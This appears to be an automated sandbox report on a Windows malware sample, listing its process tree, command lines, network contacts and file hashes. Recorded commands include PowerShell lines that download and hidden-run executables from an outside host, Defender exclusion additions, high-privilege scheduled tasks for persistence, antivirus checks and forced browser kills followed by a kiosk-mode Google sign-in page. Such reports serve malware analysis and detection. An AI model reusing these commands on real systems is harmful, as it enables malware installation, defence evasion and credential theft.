PID 2396 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2396 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2396 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2396 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2300 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2300 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2300 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2300 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 1072 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1072 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1072 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1072 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1072 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1072 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1072 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1072 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1612 wrote to memory of 1652 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1612 wrote to memory of 1652 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1612 wrote to memory of 1652 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1612 wrote to memory of 1652 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2300 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2300 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2300 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2300 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2392 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe

"C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

"C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp" /SL5="$70016,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause raf_encoder_1252

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause raf_encoder_1252

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe

"C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe"

C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe

"C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe"

C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe

"C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe"

C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe

"C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.0.1472480283\1121752671" -parentBuildID 20221007134813 -prefsHandle 1160 -prefMapHandle 1120 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5690310-0ac1-4459-8ac9-430dca97c76a} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 1296 105e3058 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.1.2100502362\1460789389" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c7e296c-6d49-4078-a606-bd84890ad74d} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 1516 f2eb858 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.2.2080604979\1613612624" -childID 1 -isForBrowser -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {318ee21d-a883-4d75-97a4-e9511f90e6a2} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 2072 1989c358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.3.882223744\1212379421" -childID 2 -isForBrowser -prefsHandle 2908 -prefMapHandle 2904 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {73529d3c-e4b3-4838-90bc-83ac4512df0a} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 2920 e6ad58 tab

C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe

"C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.4.118757683\1716330966" -childID 3 -isForBrowser -prefsHandle 3752 -prefMapHandle 3748 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6edbab0-8e75-409a-9e6e-555367ec6130} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 3764 1f7e3a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.5.58095989\1072028084" -childID 4 -isForBrowser -prefsHandle 3872 -prefMapHandle 3876 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39f6b65f-cceb-41e1-ba96-319482cc4110} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 3860 1f7e9558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.6.462080222\1802175039" -childID 5 -isForBrowser -prefsHandle 4048 -prefMapHandle 4052 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e04e6303-925c-42ee-bdb6-8db23ce3b9f6} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 4036 1f7ea458 tab

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\tasklist.exe

tasklist /fi "imagename eq mi.exe"

C:\Windows\SysWOW64\find.exe

find /i "mi.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 ratiomun.cyou udp
US 8.8.8.8:53 se-blurry.biz udp
US 172.67.162.65:443 se-blurry.biz tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 104.21.62.142:443 zinc-sneark.biz tcp
US 8.8.8.8:53 UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY udp
RU 185.215.113.16:80 185.215.113.16 tcp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 atten-supporse.biz udp
US 104.21.16.9:443 atten-supporse.biz tcp
US 172.67.162.65:443 se-blurry.biz tcp
US 104.21.62.142:443 zinc-sneark.biz tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
GB 216.58.213.14:443 www.youtube.com udp
GB 142.250.200.46:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.200.46:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com tcp
N/A 127.0.0.1:49791 tcp
N/A 127.0.0.1:49799 tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.209:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
GB 45.74.38.211:4782 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com tcp
NL 92.63.197.221:80 tcp

Files

memory/2396-0-0x00000000002F0000-0x0000000000795000-memory.dmp

memory/2396-1-0x0000000077D10000-0x0000000077D12000-memory.dmp

memory/2396-2-0x00000000002F1000-0x000000000031F000-memory.dmp

memory/2396-3-0x00000000002F0000-0x0000000000795000-memory.dmp

memory/2396-5-0x00000000002F0000-0x0000000000795000-memory.dmp

memory/2396-10-0x00000000002F0000-0x0000000000795000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 1f6294fca2fa8c5e80eafb976f65aa60
SHA1 d0d52c6af42cebe1dc967635d1d4f9d2a2a40ebd
SHA256 f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813
SHA512 aef446a9e5656bb820e8086e053972e70d4f2a315918d0c298def9610c1376c9575b91a7c3f4c1677788f8edb88d0acdffa854f417e03c63f0be90995d1c3257

memory/2396-19-0x00000000002F0000-0x0000000000795000-memory.dmp

memory/2300-20-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/2300-21-0x0000000000A91000-0x0000000000ABF000-memory.dmp

memory/2300-22-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/2300-24-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/2300-25-0x0000000000A90000-0x0000000000F35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

MD5 ff4cf493ac5f7663d1cfc243e6646eb7
SHA1 ff7184eae695580f1e86fac340925c7f01f4de6d
SHA256 72a99a945b705fc1c8fa59c3db6810be2aadeaecc34f954f5ab314574002d748
SHA512 1eef407d5bfa8b94bb98cb0a64e7c73cb94176507fa924642c6cf21192965ba8856390214379fddf192b88e19377768ead94fb4d393831e47ca230b6b168f14b

memory/2300-43-0x0000000006C60000-0x00000000070EB000-memory.dmp

memory/2300-42-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/2300-44-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/2300-46-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/2300-45-0x0000000006C60000-0x00000000070EB000-memory.dmp

memory/1060-47-0x0000000000800000-0x0000000000C8B000-memory.dmp

memory/2300-49-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/2300-50-0x0000000000A90000-0x0000000000F35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

MD5 3a16d0e4e4522073da3c8a5a9f9e790b
SHA1 7a42a21a348d2e49c67b426d333a5c354ed2c83e
SHA256 ccc4dd64df98c26da462a17a8df9f927d02e202d88ada8cfba92b7bbeb954c3e
SHA512 1213c3e077b660afa65133f0b5943bd866f02d736284791dc99ae4d30c6ed7705eb55999cb4a3be1cc0a394111904154bc72a2d0f1fdc453893ecf9a4a25b99a

memory/852-64-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp

MD5 e672d5907f1ce471d9784df64d8a306b
SHA1 6d094cae150d72b587c5480c15127d7059e16932
SHA256 9f9250be71bd6254790a9630990f4560d53995db3d8737b7f49986e3551283e5
SHA512 9cf10e997d8d99e6eb2f6ccac00ab365f63e03d96c2e2354fdf67683b85553a60cd9542cfb21cbea468c6a2bda454cde71937c0d21c4b738451b5e2c30690c39

\Users\Admin\AppData\Local\Temp\is-GA2UK.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
